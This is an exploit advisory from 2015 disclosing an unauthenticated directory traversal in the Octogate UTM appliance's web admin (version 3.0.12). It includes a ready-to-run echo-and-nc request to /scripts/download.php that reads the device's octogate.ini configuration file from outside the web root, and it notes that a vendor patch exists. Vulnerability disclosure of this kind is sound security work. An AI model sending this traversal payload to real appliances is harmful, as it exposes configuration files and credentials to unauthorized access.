# Exploit Title: Octogate UTM Admin Interface Directory Traversal# Date: 26.08.2015# Software Link: http://www.octogate.com# Exploit Author: Oliver Karow# Contact: oliver.karow@gmx.de# Website: http://www.oliverkarow.de# Category: Remote Exploit
Affected Products/Versions
--------------------------
Product Name: Octogate
Version:3.0.12- Virtual Appliance & Appliance
Product/Company Information
---------------------------
Octogate is a UTM Device, including the following features: Application
Firewall, Intrusion Detection and-Prevention, Stateful-& Deep Packet
Inspection, DoS-and DDoS protection and Reverse Proxy.
Octogate IT Security Systems GmbH is based in Germany.
Vulnerability Description
-------------------------
Octogate UTM Device is managed via web interface. The download function
for SSL-Certifcate and Documentation is accessable without
authentication,and allows access to files outside of the web root via
the script /scripts/download.php.
Example request:
echo -en
"GET /scripts/download.php?file=/../../../../../../octo/etc/ini.d/octogate.ini&type=dl
HTTP/1.0\r\nHost:192.168.0.177\r\nReferer:
http://192.168.0.177\r\nConnection: close\r\n\r\n" | nc 192.168.0.17780
Patch Information
-----------------
Patch is available from vendor.
Advisory Information
--------------------
http://www.oliverkarow.de/research/octogate.txt
